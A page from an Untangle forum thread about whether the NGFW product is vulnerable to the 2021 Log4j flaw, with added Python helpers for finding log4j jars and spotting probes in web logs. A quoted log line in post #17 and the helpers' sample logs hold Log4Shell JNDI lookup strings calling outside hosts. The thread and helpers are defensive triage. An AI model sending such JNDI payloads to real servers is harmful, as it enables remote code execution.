Page 2 of 7 FirstFirst 1234 ... LastLast
Results 11 to 20 of 63
  1. #11
    Untangler
    Join Date
    May 2008
    Posts
    548


    We will probably get banned for asking hard questions. LOL

  2. #12
    Untangler
    Join Date
    Nov 2017
    Posts
    45


    Ha! No kidding.

    Frankly I could care less. Untangle can focus on selling $50 home user licenses and I'll move onto a platform that actually takes business critical infrastructure issues seriously.

  3. #13
    Untangle Ninja sky-knight
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,498


    Code:
    [root @ untangle] ~ # find / -name '*log4j*'
    /usr/share/java/uvm/log4j-1.2.16.jar
    /usr/share/java/uvm/slf4j-log4j12-1.4.3.jar
    /usr/share/untangle/web/quarantine/WEB-INF/lib/slf4j-log4j12-1.4.3.jar
    /usr/share/untangle/conf/log4j.xml
    Vulnerable versions are 2.0 to 2.14.1. So my findings here echo Angstroli's. It seems the version Untangle uses is too old for this particular exploit.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com
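An added triage helper, not code from the thread or from Untangle, that applies the version range stated above (2.0 through 2.14.1) to the paths the `find` command returned; the sample input is the output quoted in this post, and the jar-name regex is an assumption about how log4j artifacts are named (shaded or repackaged copies would not be caught by filename alone).

```python
import re

# Constructed sample: the find output quoted in the post above.
FIND_OUTPUT = """\
/usr/share/java/uvm/log4j-1.2.16.jar
/usr/share/java/uvm/slf4j-log4j12-1.4.3.jar
/usr/share/untangle/web/quarantine/WEB-INF/lib/slf4j-log4j12-1.4.3.jar
/usr/share/untangle/conf/log4j.xml
"""

# Affected range for CVE-2021-44228 as stated in the thread: 2.0 through 2.14.1.
VULN_LOW, VULN_HIGH = (2, 0, 0), (2, 14, 1)

# Assumed naming: log4j-<ver>.jar, log4j-core-<ver>.jar, log4j-api-<ver>.jar.
# slf4j-log4j12-<ver>.jar is an SLF4J binding; its version is SLF4J's, not log4j's,
# so the lookbehind keeps it from matching on the embedded "log4j".
JAR_RE = re.compile(r"(?<![\w-])log4j(?:-core|-api)?-(\d+(?:\.\d+)*)\.jar$")

def parse_version(text: str) -> tuple:
    """'1.2.16' -> (1, 2, 16); pads to three parts so tuples compare sanely."""
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))[:3]

def classify_path(path: str) -> str:
    """Return 'vulnerable', 'log4j1', 'not-log4j-jar', or 'ok' for one path."""
    name = path.rsplit("/", 1)[-1]
    m = JAR_RE.search(name)
    if not m:
        return "not-log4j-jar"   # config files, SLF4J bindings, etc.
    ver = parse_version(m.group(1))
    if ver[0] == 1:
        return "log4j1"          # 1.x branch: outside the 2.0-2.14.1 range
    if VULN_LOW <= ver <= VULN_HIGH:
        return "vulnerable"
    return "ok"

def triage(find_output: str) -> dict:
    """Map every non-empty line of find output to its classification."""
    return {line.strip(): classify_path(line.strip())
            for line in find_output.splitlines() if line.strip()}
```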

  4. #14
    Untangler
    Join Date
    Nov 2017
    Posts
    45


    Thanks Rob. This is my assumption as well based on looking at it.

    I don't claim to be an expert at the inner workings though, so can you clarify, would it still be possible for one of the apps to be utilizing a different version inside a container? Searching wouldn't always work unless all applications were set up and installed with their respective dependencies right?

  5. #15
    Untangler
    Join Date
    May 2008
    Posts
    548


    Well it seems because they use old versions of software. Is it really safe or are the older versions just not tested?

    A new way to be secure "just use the old stuff". Nobody would think of testing those versions. LOL

  6. #16
    Untangle Ninja sky-knight
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,498


    Quote Originally Posted by MNTech68 View Post
    Thanks Rob. This is my assumption as well based on looking at it.

    I don't claim to be an expert at the inner workings though, so can you clarify, would it still be possible for one of the apps to be utilizing a different version inside a container? Searching wouldn't always work unless all applications were set up and installed with their respective dependencies right?
    I'm not a wizard of Java myself, so I can't be completely certain. But I do know that NGFW at least tries to use as much bare Debian as it can get away with. Debian is pretty solid on its own, so I don't typically worry about this sort of thing. And yes, it uses a lot of OLD but well maintained software. Stable means old after all. The curve ball lies in when Untangle fails to actually push out Debian's provided patches. Which, it often does.

    Overall, I still find NGFW to be better in the long run than anything else that lives in this space. Sonicwall, Fortigate, etc... Those things are all proprietary firmware that we cannot audit ourselves. Untangle NGFW has HUGE holes in it relative to what's ideal, but when compared to what's next to it on the shelf it's generally the best option.

    But in this specific case, my gut tells me to be more concerned about the Command Center than NGFW. After all, the only way this log4j problem becomes an issue is if the https service is exposed on the WAN. This shouldn't ever be true! I haven't been able to exploit the LAN side yet in my testing.

    I was able to exploit my Unifi controller, so I'm glad that's been patched at least.

    I was able to read through the configuration .xml file that I found earlier, and there are no references to the environment variable that exposes log4j's issue via the runtime. And the runtime itself is young enough to assume a good setting. Which is further evidence that NGFW isn't actually vulnerable.
    Last edited by sky-knight; 12-12-2021 at 01:30 PM.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  7. #17
    Untangler
    Join Date
    May 2016
    Posts
    51


    Quote Originally Posted by sky-knight View Post
    Yep, I've got a rule that simply says, if message contains log4j then block.
    I have the same rule, basically if Msg contains log4j, then Enable Block. When I search for log4j signatures, they all say Rule Action - Block.

    It doesn't seem to be working though as I just saw someone try against my webserver. Just for my amusement I pause the session for 5 seconds with modsecurity to hang up their script and then send them a 402.

    x.x.x.x 45.83.64.53 - - [12/Dec/2021:21:07:53 -0700] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 402 517 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}"

    Looking at my Intrusion Prevention reports, I don't even see 45.83.64.53 in All Events? It's like it's bypassing Intrusion Prevention? Guess I could open a ticket.
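An added example, not code from the thread or from Untangle/modsecurity, showing why a plain "contains log4j" match can miss the probe shown above: the request path arrives percent-encoded (`$%7Bjndi:...%7D`), so the check has to decode each field first. The sample lines are constructed in the same vhost-prefixed combined format as the quoted log line, with TEST-NET addresses standing in for the real ones.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (TEST-NET addresses). Line 1 mirrors the probe in the
# post above: path percent-encoded, Referer and User-Agent carrying it raw.
# Line 3 is fully percent-encoded with upper-case JNDI to exercise decoding.
SAMPLE_LOG = r'''x.x.x.x 198.51.100.7 - - [12/Dec/2021:21:07:53 -0700] "GET /$%7Bjndi:dns://198.51.100.1/securityscan-http80%7D HTTP/1.1" 402 517 "${jndi:dns://198.51.100.1/securityscan-http80}" "${jndi:dns://198.51.100.1/securityscan-http80}"
x.x.x.x 203.0.113.9 - - [12/Dec/2021:21:08:10 -0700] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
x.x.x.x 203.0.113.10 - - [12/Dec/2021:21:09:01 -0700] "GET /%24%7BJNDI%3Aldap%3A%2F%2F203.0.113.1%2Fa%7D HTTP/1.1" 404 200 "-" "curl/7.68.0"'''

# vhost client ident user [timestamp] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

def normalize(field: str) -> str:
    """Percent-decode twice (covers double-encoded probes) and lower-case,
    so "$%7Bjndi" and "%24%7BJNDI" both become "${jndi"."""
    return unquote(unquote(field)).lower()

def find_jndi_probes(log_text: str) -> list:
    """Return (client, field, decoded value) for every field holding a JNDI lookup.
    Each of request line, Referer and User-Agent is checked separately, since
    the probe above put the string in all three."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # unparseable line: skip rather than crash the scan
        for field in ("request", "referer", "agent"):
            decoded = normalize(m.group(field))
            if "${jndi:" in decoded:
                hits.append((m.group("client"), field, decoded))
    return hits

def summarize(log_text: str) -> dict:
    """Count probe fields per client, e.g. to feed a block list."""
    counts = {}
    for client, _field, _value in find_jndi_probes(log_text):
        counts[client] = counts.get(client, 0) + 1
    return counts
```

Because the match runs on the decoded fields, it fires on the encoded request path that a raw substring rule would pass, though like the IPS rule discussed here it can only see traffic that is not still wrapped in TLS when it reaches the inspecting device.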

  8. #18
    Untangle Ninja sky-knight
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,498


    The problem is, you'll have to terminate SSL on Untangle for it to see the web request. These signature matches won't do much good with HTTPS in the mix.

    I assume your HTTP site is just a redirect?
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  9. #19
    Untangler
    Join Date
    May 2016
    Posts
    51


    No, sadly it's still just an old weather station site on http. I know... I try to mitigate as much as I can by running modsecurity in front of it.
    Last edited by sspeed; 12-12-2021 at 10:07 PM.

  10. #20
    Newbie
    Join Date
    Oct 2018
    Posts
    8


    Official response to my support ticket:
    The NGFW is unaffected by the Log4J vulnerability. We use an older, patched version that is not subject to the vulnerability.
